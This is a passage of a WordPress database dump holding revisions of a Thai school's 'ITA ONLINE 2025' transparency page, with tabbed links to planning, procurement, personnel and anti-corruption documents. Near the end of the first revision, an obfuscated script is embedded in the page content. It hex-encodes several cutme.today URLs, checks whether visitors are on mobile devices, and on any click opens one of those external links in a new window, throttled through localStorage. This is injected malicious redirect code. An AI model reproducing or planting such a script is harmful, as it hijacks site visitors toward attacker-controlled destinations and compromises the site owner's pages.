data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลเชิงสถิติการให้บริการ</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-05-16 14:58:03','2025-05-16 07:58:03','',871,'http://pakhaeng.ssk.in.th/?p=1250',0,'revision','',0),
(1251,1,'2025-05-16 14:59:21','2025-05-16 07:59:21','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-7 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left 